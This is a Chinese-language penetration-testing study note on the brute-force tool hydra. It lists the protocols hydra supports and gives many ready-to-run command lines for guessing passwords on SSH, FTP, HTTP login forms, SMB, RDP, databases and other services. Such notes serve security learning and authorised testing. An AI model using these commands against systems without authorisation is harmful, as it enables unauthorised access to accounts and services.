渗透测试自学笔记,想把自己所学的完整记录下来
hydra 是一个支持众多协议的爆破工具,已经集成到Kali-Linux中,直接在终端打开即可,同时也有Windows版(链接)
Windows版
Kali版
你可以在Github上找到它的源码: https://github.com/vanhauser-thc/thc-hydraHydra
其中GUI版本叫 xhydra,直接在终端中输入命令打开(或者在菜单中寻找打开)
* Asterisk
* AFP
* Cisco AAA
* Cisco auth
* Cisco enable
* CVS
* Firebird
* FTP
* HTTP-FORM-GET
* HTTP-FORM-POST
* HTTP-GET
* HTTP-HEAD
* HTTP-POST
* HTTP-PROXY
* HTTPS-FORM-GET
* HTTPS-FORM-POST
* HTTPS-GET
* HTTPS-HEAD
* HTTPS-POST
* HTTP-Proxy
* ICQ
* IMAP
* IRC
* LDAP
* MS-SQL
* MYSQL
* NCP
* NNTP
* Oracle Listener
* Oracle SID
* Oracle
* PC-Anywhere
* PCNFS
* POP3
* POSTGRES
* RDP
* Rexec
* Rlogin
* Rsh
* RTSP
* SAP/R3
* SIP
* SMB
* SMTP
* SMTP Enum
* SNMP v1+v2+v3
* SOCKS5
* SSH (v1 and v2)
* SSHKEY
* Subversion
* Teamspeak (TS2)
* Telnet
* VMware-Auth
* VNC
* XMPP
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password "
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。)
hydra -m /index.php -l muts -P pass.txt IP https
hydra -m /index.php -l username -P pass.txt IP https
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt IP cisco-enable
hydra -l administrator -P pass.txt 10.36.16.18 smb
hydra -l muts -P pass.txt my.pop3.mail pop3
hydra ip rdp -l administrator -P pass.txt -V
hydra -l admin -P pass.txt http-proxy://IP
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
hydra -l root -P /root/pentest/passwd.txt mysql://192.168.0.100 -f -o /root/pentest/mysql.txt -V
oracle
hydra -P /root/passwd oracle://192.168.0.100 -f -o /root/oracle.txt –v
redis
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 redis
postgresql
hydra -P /root/passlist.txt -e nsr -t 16 192.168.0.101 postgresql
1、xhydra是hydra的可视化工具,在kali命令行中输入xhydra即可开启
以爆破mssql为例。
target页面选项解释如下:
password页面选项解释如下:
Tuning页面选项解释如下:
start页面选项解释如下:
参考文章
https://www.freebuf.com/articles/web/265477.html